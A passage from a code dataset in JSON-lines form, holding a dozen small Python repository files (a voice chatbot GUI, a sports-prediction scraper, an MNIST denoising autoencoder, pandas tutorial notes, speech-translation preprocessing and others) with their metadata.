'\\n\\n')\r\n ChatLog.config(state=DISABLED)\r\n base.update()\r\n\r\n with open(filename,'w') as f:\r\n f.write(note)\r\n done=True\r\n res = \"successfully created the note\"\r\n except speech_recognition.UnknownValueError:\r\n res=\"Sorry could not Understand That\"\r\n\r\n return res\r\n\r\ndef add_todo():\r\n speaker.say(\"What todo you want to add\")\r\n speaker.runAndWait()\r\n ChatLog.config(state=NORMAL)\r\n ChatLog.insert(END, \"Lyra : What todo you want to add\" + '\\n\\n')\r\n ChatLog.config(state=DISABLED)\r\n base.update()\r\n\r\n done=False\r\n\r\n while not done:\r\n try:\r\n with speech_recognition.Microphone() as mic:\r\n recognizer.adjust_for_ambient_noise(mic,duration=0.5)\r\n audio=recognizer.listen(mic)\r\n\r\n item=recognizer.recognize_google(audio)\r\n item=item.lower()\r\n todo.append(item)\r\n\r\n speaker.say(\"Do you want to add more todo in the list\")\r\n speaker.runAndWait()\r\n ChatLog.config(state=NORMAL)\r\n ChatLog.insert(END, \"Lyra : Do you want to add more todo in the list\" + '\\n\\n')\r\n ChatLog.config(state=DISABLED)\r\n base.update()\r\n audio=recognizer.listen(mic)\r\n ans=recognizer.recognize_google(audio)\r\n ChatLog.config(state=NORMAL)\r\n ChatLog.insert(END, \"You : \" + ans + '\\n\\n')\r\n ChatLog.config(state=DISABLED)\r\n base.update()\r\n if 'yes' in ans:\r\n done=False\r\n else:\r\n done=True\r\n res = \"Todos added in the list\"\r\n except speech_recognition.UnknownValueError:\r\n res=\"Sorry could not Understand That\"\r\n return res\r\n\r\ndef show_todo():\r\n ChatLog.config(state=NORMAL)\r\n ChatLog.insert(END, \"Lyra : The items on your list are\" + '\\n')\r\n #ChatLog.config(state=DISABLED)\r\n speaker.say(\"The items on your list are \")\r\n for item in todo:\r\n speaker.say(item)\r\n #ChatLog.config(state=NORMAL)\r\n ChatLog.insert(END, \"Lyra : \" + item + '\\n\\n')\r\n ChatLog.config(state=DISABLED)\r\n speaker.runAndWait()\r\n\r\n\r\n\r\n\r\n\r\nprint(\"Bot is Running\")\r\ndef chatbot_res(text):\r\n intents_list = predict_class(text, model)\r\n if intents_list[0]['intent']=='weather':\r\n res=chatbot(text)\r\n print('weather')\r\n speaker.say(res)\r\n speaker.runAndWait()\r\n return res\r\n elif 'search' in text:\r\n text=text.lower()\r\n #text = text.replace(\"search\", \"\")\r\n co = Options()\r\n co.add_experimental_option(\"detach\", True)\r\n driver = webdriver.Chrome(r\"C:\\chromedriver.exe\", options=co)\r\n driver.implicitly_wait(1)\r\n driver.maximize_window()\r\n indx = text.split().index(\"search\")\r\n ind = text.split()[indx + 1:]\r\n driver.get(\"https://www.google.com/search?client=firefox-b-d&q=\"+'+'.join(ind))\r\n print(\"https://www.google.com/search?client=firefox-b-d&q=\"+'+'.join(ind))\r\n speaker.say(\"Opened website\")\r\n speaker.runAndWait()\r\n return (\"searched \"+text)\r\n elif intents_list[0]['intent']=='meaning':\r\n res=meaning(text)\r\n speaker.say(res)\r\n speaker.runAndWait()\r\n return res\r\n elif 'time' in text:\r\n res=datetime.datetime.now().strftime(\"%H:%M:%S\")\r\n speaker.say(f\"The time is {res}\")\r\n speaker.runAndWait()\r\n return res\r\n elif intents_list[0]['intent']=='song':\r\n res=yt(text)\r\n speaker.say(res)\r\n speaker.runAndWait()\r\n return res\r\n elif intents_list[0]['intent']=='createnote':\r\n res=create_note()\r\n return res\r\n elif intents_list[0]['intent']=='addtodo':\r\n res=add_todo()\r\n return res\r\n elif intents_list[0]['intent']=='showtodo':\r\n res=show_todo()\r\n return res\r\n elif intents_list[0]['intent']=='bye':\r\n res=get_response(intents_list,intents)\r\n speaker.say(res)\r\n speaker.runAndWait()\r\n ChatLog.config(state=NORMAL)\r\n #ChatLog.insert(END, \"You : \" + text + '\\n\\n')\r\n\r\n ChatLog.insert(END, \"Lyra : \" + res + '\\n\\n')\r\n ChatLog.config(state=DISABLED)\r\n base.update()\r\n time.sleep(4)\r\n base.destroy()\r\n\r\n else:\r\n res = get_response(intents_list, intents)\r\n speaker.say(res)\r\n speaker.runAndWait()\r\n return res\r\n\r\n\r\nimport tkinter\r\nfrom tkinter import *\r\nfrom PIL import Image,ImageTk\r\n\r\ndef send():\r\n msg=EntryBox.get(\"1.0\",'end-1c').strip()\r\n EntryBox.delete(\"0.0\",END)\r\n\r\n if msg!='':\r\n ChatLog.config(state=NORMAL)\r\n ChatLog.insert(END,\"You : \"+msg+'\\n\\n')\r\n\r\n ChatLog.config(foreground=\"#442265\",font=(\"Verdana\",12))\r\n ChatLog.config(state=DISABLED)\r\n base.update()\r\n res=chatbot_res(msg)\r\n ChatLog.config(state=NORMAL)\r\n ChatLog.insert(END,\"Lyra : \"+res+'\\n\\n')\r\n ChatLog.config(state=DISABLED)\r\n ChatLog.yview(END)\r\n\r\ndef micsend():\r\n global res,msg,msg1\r\n with speech_recognition.Microphone() as mic:\r\n recognizer.adjust_for_ambient_noise(mic,duration=0.2)\r\n print(\"say anything\")\r\n audio=recognizer.listen(mic)\r\n try:\r\n msg=recognizer.recognize_google(audio)\r\n ChatLog.config(state=NORMAL)\r\n ChatLog.insert(END, \"You : \" + msg + '\\n\\n')\r\n ChatLog.config(state=DISABLED)\r\n base.update()\r\n res = chatbot_res(msg)\r\n\r\n except:\r\n speaker.say(\"Sorry could not understand that\")\r\n speaker.runAndWait()\r\n msg=\"Sorry could not Understand That\"\r\n\r\n if msg==\"Sorry could not Understand That\":\r\n res=msg\r\n ChatLog.config(state=NORMAL)\r\n #ChatLog.insert(END, \"You : \" + msg + '\\n\\n')\r\n ChatLog.config(foreground=\"#442265\", font=(\"Verdana\", 12))\r\n ChatLog.insert(END, \"Lyra : \" + res + '\\n\\n')\r\n ChatLog.config(state=DISABLED)\r\n ChatLog.yview(END)\r\n\r\n\r\nimport tkinter\r\nfrom tkinter import *\r\nfrom PIL import Image,ImageTk\r\nbase=Tk()\r\nbase.title(\"LYRA\")\r\nbase.geometry(\"500x550\")\r\nbase.resizable(width=False,height=False)\r\n#bg=ImageTk.PhotoImage(file=\"img.png\")\r\nbg1=Image.open(\"img2.jpg\")\r\nresi=bg1.resize((500,530),Image.ANTIALIAS)\r\nbg1=ImageTk.PhotoImage(resi)\r\n\r\nbg=Image.open(\"img3.png\")\r\nresize=bg.resize((200,330),Image.ANTIALIAS)\r\nbg=ImageTk.PhotoImage(resize)\r\n\r\nmicb=Image.open(\"mic.jpg\")\r\nresiz=micb.resize((80,80),Image.ANTIALIAS)\r\nmicb=ImageTk.PhotoImage(resiz)\r\n\r\ncanvas=Canvas(base,width=40,height=20)\r\ncanvas.pack(expand=True,fill=BOTH)\r\n#canvas.create_image(0,0,image=bg1,anchor=\"nw\")\r\n#canvas.create_image(295,60,image=bg,anchor=\"nw\")\r\nbg2=Image.open(\"bg.jpg\")\r\nre=bg2.resize((500,600),Image.ANTIALIAS)\r\nbg2=ImageTk.PhotoImage(re)\r\ncanvas.create_image(0,0,image=bg2,anchor=\"nw\")\r\n\r\n\r\nChatLog=Text(base,bd=0,bg=\"#e6e2c1\",height=\"8\",width=\"40\",font=\"Arial\")\r\n\r\nChatLog.config(state=DISABLED)\r\n\r\nscrollbar=Scrollbar(base,command=ChatLog.yview,cursor=\"heart\")\r\nChatLog['yscrollcommand']=scrollbar.set\r\n\r\n\r\nsendbutton=Button(base,font=(\"Arial Black\",15,'bold'),text=\"Send\",width='9',height=5,bd=0,bg=\"#c9b940\",activebackground='#2c12c4',fg=\"#b80920\",command=send)\r\n\r\nmicbutton=Button(base,image=micb,font=(\"Arial Black\",12),text=\"Mic\",width='55',height=5,bg=\"#f5e5ab\",bd=2,activebackground='#91e4e6',fg='#cf1d38',command=micsend)\r\n\r\nEntryBox=Text(base, bd=0,bg='#e6e2c1',width='29',height='5',font='Arial')\r\n\r\n\r\nscrollbar.place(x=450,y=60,height=330)\r\nChatLog.place(x=67,y=60,height=330,width=375)\r\nEntryBox.place(x=200,y=411,height=90,width=265)\r\nsendbutton.place(x=60,y=411,height=90)\r\nmicbutton.place(x=240,y=10,height=50)\r\n\r\nbase.mainloop()","repo_name":"rani1040/AI_CHAT_BOT","sub_path":"chatbot.py","file_name":"chatbot.py","file_ext":"py","file_size_in_byte":14105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39013295233","text":"import json\nimport subprocess\nfrom glob import glob\n\nimport app\nfrom app.src import confighelpers as Configurer\nfrom app.src.constants import Nginx_Dir_Type\n\n\ndef main(args=None):\n n_version, n_args, n_dir_type = Configurer.get_nginx_details()\n if n_dir_type == Nginx_Dir_Type.light:\n n_dir = \"%s/conf.d\" % n_args.prefix\n else:\n n_dir = \"%s/sites-available\" % n_args.prefix\n\n registered_configs = json.dumps(\n glob(\"%s/*.lm.conf*\" % n_dir),\n indent=4,\n sort_keys=True\n )\n\n print(\n '''\n%s: %s\n\nRegistered configs:\n%s\n\nEnvironment details:\n%s\n''' % (\n app.name,\n app.version,\n registered_configs,\n json.dumps((n_version, vars(n_args)), indent=4, sort_keys=True)\n )\n )\n","repo_name":"Cloudxtreme/nginx-lm","sub_path":"app/src/commands/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"15423012132","text":"import requests\nimport bs4\nfrom lxml import html\n\nclass StatSalt:\n\n sportWebsiteMap = {\n \"siteHomePage\" : \"https://statsalt.com\",\n \"ncaab\" : \"https://statsalt.com/games/ncaab/\",\n \"nfl\" : \"https://statsalt.com/games/nfl/\",\n \"nba\" : \"https://statsalt.com/games/nba/\"\n }\n\n def __init__(self, sport):\n self.currentSportWebsite = self.sportWebsiteMap[sport]\n self.pageRequest = requests.get(self.currentSportWebsite)\n self.pageTree = html.fromstring(self.pageRequest.content)\n\n \n def getPrediction(self, team1, team2):\n predictionSiteLink = self.getPredictionSiteLink(team1, team2)\n\n if not predictionSiteLink:\n return \"Not a valid game\"\n\n predictions = self.getAllAvailablePredictions(predictionSiteLink)\n\n return predictions\n\n\n def getPredictionSiteLink(self, team1, team2):\n rowOfGamesElem = self.pageTree.xpath('//*[@id=\"cards\"]')\n #it seems that this set below isnt needed here because only 1 link per team is being found\n # potentialGameLinks = set()\n\n correctLink = \"\"\n \n for x in rowOfGamesElem:\n links = x.iterlinks()\n\n for i in links:\n if (team1 in i[2]) and (team2 in i[2]) and (i[2][0:5] == \"https\"):\n correctLink = i[2]\n break\n\n return correctLink\n\n \n def getAllAvailablePredictions(self, predictionSiteLink):\n pageRequest = requests.get(predictionSiteLink)\n pageTree = html.fromstring(pageRequest.content)\n \n #this finds all div classes named \"pick\" and returns a list of its children element\n pickClassElemList = pageTree.find_class(\"pick\")\n predictions = []\n\n #we have to go 2 layers of children down for this website, to find the actual predictions\n for curElem in pickClassElemList:\n parent = curElem.getparent()\n currentBetType = parent.find('h5').text # returns the bet type\n \n for curPrediction in curElem.getchildren():\n for curPredChild in curPrediction.getchildren():\n prediction = currentBetType + ': ' + curPredChild.text\n predictions.append(prediction.strip().lower())\n \n return predictions\n","repo_name":"JeffSandov6/GamePredictionsScanner","sub_path":"Websites/StatSalt.py","file_name":"StatSalt.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"16020512167","text":"import numpy as np\r\n\r\ndef isPrime(n):\r\n if n < 2:\r\n return False\r\n \r\n if n==2:\r\n return True\r\n\r\n if not n & 1:\r\n return False\r\n \r\n for x in range(3,int(n**.5)+1,2):\r\n if n%x==0:\r\n return False \r\n return True\r\nk=0\r\nprim=1\r\nwhile k<=10000:\r\n prim+=1\r\n if isPrime(prim):\r\n k+=1\r\n \r\nprint(prim)","repo_name":"JesperDramsch/ProjectEuler","sub_path":"A007.py","file_name":"A007.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"35760905011","text":"import yaml\n\n\nclass Configuration(object):\n def __init__(self, cfg):\n with open(cfg, 'r') as f:\n docs = yaml.load_all(f)\n for idx in docs:\n for key, value in idx.items():\n if key == 'training':\n for k1, v1, in value.items():\n cmd = 'self.' + k1 + '=' + repr(v1)\n exec(cmd)\n f.close()\n\n \n\n# if __name__ == '__main__':\n# c = Configuration('/home/sarthak/als_aai/cfg.yaml')\n# print(c.hyperparameters)\n","repo_name":"sarthaxxxxx/AAI-ALS","sub_path":"utils/config_tool.py","file_name":"config_tool.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"22109163153","text":"def is_prime(n):\r\n count = 0\r\n for i in range(1, n + 1):\r\n if n % i == 0:\r\n count += 1\r\n if count == 2:\r\n return \"YES\"\r\n return \"NO\"\r\n\r\nn = int(input())\r\nprint(is_prime(n))","repo_name":"QuocVinhVKU/BaitapPython","sub_path":"Bai21_tinhNguyenTo.py","file_name":"Bai21_tinhNguyenTo.py","file_ext":"py","file_size_in_byte":209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19761293489","text":"from turtle import *\n\nspeed('slowest')\n\n# Turning the turtle to face upwards\nrt(-90)\n\n# The acute angle between\n# the Y's base and branch\nangle = 30\n\n\n# Function to plot a Y\ndef plot_y(size, level):\n\n if level > 0:\n\n colormode(255)\n\n # Splitting the rgb range for green\n # into equal intervals for each level\n # Setting the color according\n # to the current level\n pencolor(0, 255//level, 0)\n\n # Drawing the base\n fd(size)\n rt(angle)\n\n # Recursive call for the right subtree\n plot_y(0.8 * size, level-1)\n\n pencolor(0, 255//level, 0)\n\n lt(2 * angle)\n\n # Recursive call for the left subtree\n plot_y(0.8 * size, level-1)\n\n pencolor(0, 255//level, 0)\n\n rt(angle)\n fd(-size)\n\n\nplot_y(80, 8)\n\n","repo_name":"kauasales/lpc","sub_path":"turtle/tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9313640197","text":"# evaluation\n# @dlei5\n# calculate accuracy and recall\n\nimport sys\nfrom collections import defaultdict\nfrom collections import deque\n\ndef checkAncesterCorrect(child, ancestor):\n if child not in child2parent:\n return False\n \n if child2parent[child] == ancestor:\n return True\n \n return checkAncesterCorrect(child2parent[child], ancestor)\n \ndef permute(edges):\n permuted_edges = defaultdict(set)\n for c, pset in edges.items():\n permuted_edges[c].union(pset)\n \n stack = list(pset)\n while len(stack):\n pp = stack.pop()\n if pp in edges:\n stack += edges[pp]\n permuted_edges[c].add(pp)\n \n return permuted_edges\n\n\ndef readEdgesToSet(fileName):\n dic = defaultdict(set)\n with open(fileName) as fin:\n for line in fin:\n line = line.strip()\n segs = line.split(\"\\t\")\n\n parent = segs[0]\n child = segs[1]\n dic[child].add(parent)\n \n return dic\n\ndef calcTotal(values):\n total = 0\n for v in values:\n total += len(v)\n return total\n\ndef eval(pred, gold):\n correct = 0\n for c, p in pred.items():\n if c in gold:\n correct += len(p & gold[c]) #intersect(p, gold[c])\n \n print(\"correct:\", correct / calcTotal(pred.values()))\n print(\"recall:\", correct / calcTotal(gold.values()))\n\n \nif __name__ == \"__main__\":\n\n if len(sys.argv) < 4:\n print(\"usage: python eval.py $DATANAME $GOLD_TAXONOMY_EDGE_FILE $PRED_TAXONOMY_EDGE_FILE\")\n # print(\"example: python generateEdges.py dblpv2 dblpv2-l3/taxonomy_test_new_hiexpan_iter_1_postprune.txt\")\n\n data = sys.argv[1]\n goldFile = sys.argv[2]\n predFile = sys.argv[3]\n \n dataDir = '../../data/' + data + '/results/'\n\n # readin correct edges\n pred = readEdgesToSet(dataDir + predFile)\n gold = readEdgesToSet(dataDir + goldFile)\n\n print('edge-based metris: ')\n eval(pred, gold)\n print('ancestor-based metris: ')\n eval(permute(pred), permute(gold))\n\n","repo_name":"dlei/HiExpan","sub_path":"src/HiExpan/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"74178635128","text":"# author: Asmaa ~ 2019\n# Coursera Introduction to data science course\n# WEEK3 Advanced Pandas - Scales, Pivot Table and Dates\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# SCALES\n# create a data farme\n# Nominal Scale\ngrades = pd.DataFrame(['AA', 'BA', 'BB', 'CB', 'CC', 'DC', 'DD', 'FD', 'FF'], index=[\n 'perfect', 'excellent', 'excellent', 'good', 'good', 'ok', 'ok',\n 'failed', 'failed']).rename(columns={0: 'letter'})\n\n\n# convert into Ordinal Scale\nordered_grades = grades['letter'].astype('category', categories=[\n 'FF', 'FD', 'DD', 'DC', 'CC', 'CB', 'BB', 'BA', 'AA'], ordered=True)\n\n# apply boolean masking\ncourse = pd.DataFrame(['FF', 'DC', 'AA'])\nprint(course < 'CC')\n\n\n# PIVOT TABLES\ncars = pd.read_csv('cars.csv')\nprint(cars.shape)\n\n# returns a table has YEAR field (distinct values) as row names and\n# Make field as column names and the values are the average of kW\n# field for corresponding Make and YEAR values (Liked it ^_^)\npivot = cars.pivot_table(values='(kW)', index='YEAR',\n columns='Make', aggfunc=np.mean)\nprint(pivot)\n\n# --------------------------------------------------------\n# DATES\n\n# common functions\n# get time and date\nts = pd.Timestamp('7/11/1998 12:15AM')\nprint(ts)\n\n# get month or day\nm = pd.Period('11/1998')\nd = pd.Period('7/11/1998')\nprint(m, d)\n\n# DateTimeIndex - use dates as indices\ns = pd.Series(['asmaa', 'esma'], [pd.Timestamp(\n '7/11/1998 12AM'), pd.Timestamp('7/11/1998 12PM')])\nprint(s)\n\n\n# date formatting (Liked it :D)\n# in default yyyy-dd-mm\ndates = ['7/11/1998', '26.6.2019', 'June 5 2015']\nprint(pd.to_datetime(dates))\n\n# yyyy-mm-dd\nprint(pd.to_datetime(dates, dayfirst=True))\n\n# Time Deltas (time differences) (LIKED it :p)\ndelta = pd.Timestamp('26/6/2019')-pd.Timestamp('7/11/1998')\nprint(delta)\n\n# date range (start date, number of terms, length of term)\ndr = pd.date_range('28/9/2013', periods=7, freq='2M')\nprint(dr)\n\n# use date range as an index for data frame\ndata = pd.DataFrame({'Num 1': np.random.randint(0, 30, 7).cumsum(),\n 'Num 2': np.random.randint(0, 60, 7)}, index=dr)\n\n\nprint(data)\n\n# querying\nprint(data['2014'])\nprint(data['2014-05'])\n\n\n# change frequency of dates\nprint(data.asfreq('1M', method='ffill'))\n\ndata.plot()\n","repo_name":"asmaamirkhan/AppliedDataScienceSpecialization","sub_path":"1-IntroductionToDataScience/3-ADVANCED-PYTHON-PANDAS/AsmaaAdvancedPandasOtherCocepts.py","file_name":"AsmaaAdvancedPandasOtherCocepts.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"8156278346","text":"#!/bin/python3\n# -*- coding: utf-8 -*-\n\nimport json\n\nfrom inno_config import *\nfrom inno_lib import *\n\nif __name__ == '__main__':\n InnoPrintJsonHeader()\n\n cmd = 'uptime'\n statusStr = InnoGetCmdRst(cmd)\n\n cmd = 'free'\n infoStr = InnoGetCmdRst(cmd)\n infoList = infoStr.split('\\n')\n memList = infoList[1].split(' ')\n cacheList = infoList[2].split(' ')\n\n memUsed = int(memList[14])\n memFree = int(memList[19])\n cacheUsed = int(cacheList[7])\n cacheFree = int(cacheList[-1])\n\n #print(infoList)\n #print()\n #print(memList)\n #print(cacheList)\n obj = {\n 'status': statusStr,\n 'memUsed': memUsed,\n 'memFree': memFree,\n 'memTotal': memUsed + memFree,\n\n 'cacheUsed':cacheUsed,\n 'cacheFree':cacheFree,\n 'cacheTotal':cacheUsed + cacheFree\n }\n\n InnoPrintJson(obj)\n\n","repo_name":"aepkolol/innofirmware","sub_path":"home/www/cgi-bin/system.py","file_name":"system.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"70807101370","text":"import numpy as np\nfrom keras.datasets import mnist\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\nfrom torchvision import transforms\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader,Dataset\nimport torch\nimport torch.optim as optim\nfrom torch.autograd import Variable\n\n\ndef add_noise(img, noise_type=\"gaussian\"):\n row, col = 28, 28\n img = img.astype(np.float32)\n\n if noise_type == \"gaussian\":\n mean = 0\n var = 10\n sigma = var ** .5\n noise = np.random.normal(-5.9, 5.9, img.shape)\n noise = noise.reshape(row, col)\n img = img + noise\n return img\n\n if noise_type == \"speckle\":\n noise = np.random.randn(row, col)\n noise = noise.reshape(row, col)\n img = img + img * noise\n return img\n\n(xtrain,ytrain),(xtest,ytest)=mnist.load_data()\nprint(\"No of training datapoints:{}\\nNo of Test datapoints:{}\".format(len(xtrain),len(xtest)))\n\n\"\"\"\nFrom here onwards,we split the 60k training datapoints into 3 sets each given one type of each noise.\nWe shuffle them for better generalization.\n\"\"\"\nnoises = [\"gaussian\", \"speckle\"]\nnoise_ct = 0\nnoise_id = 0\ntraindata = np.zeros((60000, 28, 28))\n\nfor idx in tqdm(range(len(xtrain))):\n\n if noise_ct < (len(xtrain) / 2):\n noise_ct += 1\n traindata[idx] = add_noise(xtrain[idx], noise_type=noises[noise_id])\n\n else:\n print(\"\\n{} noise addition completed to images\".format(noises[noise_id]))\n noise_id += 1\n noise_ct = 0\n\nprint(\"\\n{} noise addition completed to images\".format(noises[noise_id]))\n\nnoise_ct = 0\nnoise_id = 0\ntestdata = np.zeros((10000, 28, 28))\n\nfor idx in tqdm(range(len(xtest))):\n\n if noise_ct < (len(xtest) / 2):\n noise_ct += 1\n x = add_noise(xtest[idx], noise_type=noises[noise_id])\n testdata[idx] = x\n\n else:\n print(\"\\n{} noise addition completed to images\".format(noises[noise_id]))\n noise_id += 1\n noise_ct = 0\n\nprint(\"\\n{} noise addition completed to images\".format(noises[noise_id]))\n\n\n\"\"\"\nHere we Try to visualize, each type of noise that was introduced in the images\nAlong with their original versions\n\n\"\"\"\n\nf, axes=plt.subplots(2,2)\n\n#showing images with gaussian noise\naxes[0,0].imshow(xtrain[0],cmap=\"gray\")\naxes[0,0].set_title(\"Original Image\")\naxes[1,0].imshow(traindata[0],cmap='gray')\naxes[1,0].set_title(\"Noised Image\")\n\n#showing images with speckle noise\naxes[0,1].imshow(xtrain[25000],cmap='gray')\naxes[0,1].set_title(\"Original Image\")\naxes[1,1].imshow(traindata[25000],cmap=\"gray\")\naxes[1,1].set_title(\"Noised Image\")\n\n\nclass noisedDataset(Dataset):\n\n def __init__(self, datasetnoised, datasetclean, labels, transform):\n self.noise = datasetnoised\n self.clean = datasetclean\n self.labels = labels\n self.transform = transform\n\n def __len__(self):\n return len(self.noise)\n\n def __getitem__(self, idx):\n xNoise = self.noise[idx]\n xClean = self.clean[idx]\n y = self.labels[idx]\n\n if self.transform != None:\n xNoise = self.transform(xNoise)\n xClean = self.transform(xClean)\n\n return (xNoise, xClean, y)\n\ntsfms=transforms.Compose([ transforms.ToTensor()])\n\ntrainset=noisedDataset(traindata,xtrain,ytrain,tsfms)\ntestset=noisedDataset(testdata,xtest,ytest,tsfms)\n\n\n\"\"\"\nHere , we create the trainloaders and testloaders.\nAlso, we transform the images using standard lib functions\n\"\"\"\n\n\nbatch_size=32\n\n\n\ntrainloader=DataLoader(trainset,batch_size=32,shuffle=True)\ntestloader=DataLoader(testset,batch_size=1,shuffle=True)\n\n\"\"\"\nHere, we define the autoencoder model.\n\"\"\"\n\n\nclass denoising_model(nn.Module):\n def __init__(self):\n super(denoising_model, self).__init__()\n self.encoder = nn.Sequential(\n nn.Linear(28 * 28, 256),\n nn.ReLU(True),\n nn.Linear(256, 128),\n nn.ReLU(True),\n nn.Linear(128, 64),\n nn.ReLU(True)\n\n )\n\n self.decoder = nn.Sequential(\n nn.Linear(64, 128),\n nn.ReLU(True),\n nn.Linear(128, 256),\n nn.ReLU(True),\n nn.Linear(256, 28 * 28),\n nn.Sigmoid(),\n )\n\n def forward(self, x):\n x = self.encoder(x)\n x = self.decoder(x)\n\n return x\n\n\n# We check whether cuda is available and choose device accordingly\nif torch.cuda.is_available() == True:\n device = \"cuda:0\"\nelse:\n device = \"cpu\"\n\nmodel = denoising_model().to(device)\ncriterion = nn.MSELoss()\noptimizer = optim.SGD(model.parameters(), lr=0.01, weight_decay=1e-5)\n\nepochs = 120\nl = len(trainloader)\nlosslist = list()\nepochloss = 0\nrunning_loss = 0\nfor epoch in range(epochs):\n\n print(\"Entering Epoch: \", epoch)\n for dirty, clean, label in tqdm((trainloader)):\n dirty = dirty.view(dirty.size(0), -1).type(torch.FloatTensor)\n clean = clean.view(clean.size(0), -1).type(torch.FloatTensor)\n dirty, clean = dirty.to(device), clean.to(device)\n\n # -----------------Forward Pass----------------------\n output = model(dirty)\n loss = criterion(output, clean)\n # -----------------Backward Pass---------------------\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n running_loss += loss.item()\n epochloss += loss.item()\n # -----------------Log-------------------------------\n losslist.append(running_loss / l)\n running_loss = 0\n print(\"======> epoch: {}/{}, Loss:{}\".format(epoch, epochs, loss.item()))\n\nplt.plot(range(len(losslist)),losslist)\n\n\"\"\"Here, we try to visualize some of the results.\n We randomly generate 6 numbers in between 1 and 10k , run them through the model,\n and show the results with comparisons\n\n \"\"\"\n\nf, axes = plt.subplots(6, 3, figsize=(20, 20))\naxes[0, 0].set_title(\"Original Image\")\naxes[0, 1].set_title(\"Dirty Image\")\naxes[0, 2].set_title(\"Cleaned Image\")\n\ntest_imgs = np.random.randint(0, 10000, size=6)\nfor idx in range((6)):\n dirty = testset[test_imgs[idx]][0]\n clean = testset[test_imgs[idx]][1]\n label = testset[test_imgs[idx]][2]\n dirty = dirty.view(dirty.size(0), -1).type(torch.FloatTensor)\n dirty = dirty.to(device)\n output = model(dirty)\n\n output = output.view(1, 28, 28)\n output = output.permute(1, 2, 0).squeeze(2)\n output = output.detach().cpu().numpy()\n\n dirty = dirty.view(1, 28, 28)\n dirty = dirty.permute(1, 2, 0).squeeze(2)\n dirty = dirty.detach().cpu().numpy()\n\n clean = clean.permute(1, 2, 0).squeeze(2)\n clean = clean.detach().cpu().numpy()\n\n axes[idx, 0].imshow(clean, cmap=\"gray\")\n axes[idx, 1].imshow(dirty, cmap=\"gray\")\n axes[idx, 2].imshow(output, cmap=\"gray\")","repo_name":"maryamshahpasand/advGAN_pytorch","sub_path":"AE.py","file_name":"AE.py","file_ext":"py","file_size_in_byte":6682,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"72620943609","text":"#!/usr/bin/env python3\nimport os\nimport csv\nimport argparse\nfrom tqdm import tqdm\nimport pandas as pd\nfrom collections import Counter, defaultdict\nfrom examples.speech_to_text.data_utils import(\n load_tsv_to_dicts,\n save_df_to_tsv\n)\nfrom examples.s2s_trans.preprocessing.data_utils import ipa_phonemize\nfrom pypinyin import pinyin\nfrom pypinyin import Style\nfrom examples.s2s_trans.preprocessing.cn_tn import run_cn_tn\nimport tacotron_cleaner\nimport re\ndef pypinyin_g2p_phone(text):\n from pypinyin import pinyin\n from pypinyin import Style\n from pypinyin.style._utils import get_finals\n from pypinyin.style._utils import get_initials\n\n phones = [\n p\n for phone in pinyin(text, style=Style.TONE3)\n for p in [\n get_initials(phone[0], strict=True),\n get_finals(phone[0], strict=True),\n ]\n if len(p) != 0\n ]\n return phones\n# check english character\nen_pattern = re.compile(r'[A-Za-z]',re.S)\n# 去掉标点\nreg = \"[^0-9A-Za-z\\u4e00-\\u9fa5]\"\ndef process(args):\n samples = []\n for e in load_tsv_to_dicts(args.input_file):\n samples.append(e)\n total_nums = len(samples)\n \n manifest_by_split=defaultdict(list)\n for j in tqdm(range(total_nums)):\n res = re.findall(en_pattern,samples[j][\"tgt_text\"])\n if len(res) > 0:\n print(\"find english character at id %s, context is %s\" %(samples[j][\"id\"], samples[j][\"tgt_text\"]))\n continue\n #qprint(\"doing\")\n normalized_src_utt = tacotron_cleaner.cleaners.custom_english_cleaners(samples[j][\"src_text\"])\n #print(normalized_src_utt)\n normalized_src_utt = ipa_phonemize(\n normalized_src_utt , lang=\"en-us\", use_g2p=True\n )\n #print(normalized_src_utt)\n #print(samples[j][\"tgt_text\"])\n normalized_tgt_utt = run_cn_tn(samples[j][\"tgt_text\"].replace(\" \",\"\"))\n normalized_tgt_utt = re.sub(reg, '', normalized_tgt_utt)\n #print(normalized_tgt_utt)\n space_normalized_tgt_utt = \"\"\n for i in range(len(normalized_tgt_utt)):\n if i == len(normalized_tgt_utt) -1:\n space_normalized_tgt_utt = space_normalized_tgt_utt + normalized_tgt_utt[i]\n else:\n space_normalized_tgt_utt = space_normalized_tgt_utt + normalized_tgt_utt[i] + \"|\"\n #print(space_normalized_tgt_utt)\n space_normalized_tgt_utt = (\" \").join(pypinyin_g2p_phone(space_normalized_tgt_utt))\n #print(space_normalized_tgt_utt)\n\n manifest_by_split[\"id\"].append(samples[j][\"id\"])\n manifest_by_split[\"src_audio\"].append(samples[j][\"src_audio\"])\n manifest_by_split[\"src_n_frames\"].append(samples[j][\"src_n_frames\"])\n manifest_by_split[\"src_text\"].append(normalized_src_utt)\n manifest_by_split[\"tgt_audio\"].append(samples[j][\"tgt_audio\"])\n manifest_by_split[\"tgt_n_frames\"].append(samples[j][\"tgt_n_frames\"])\n 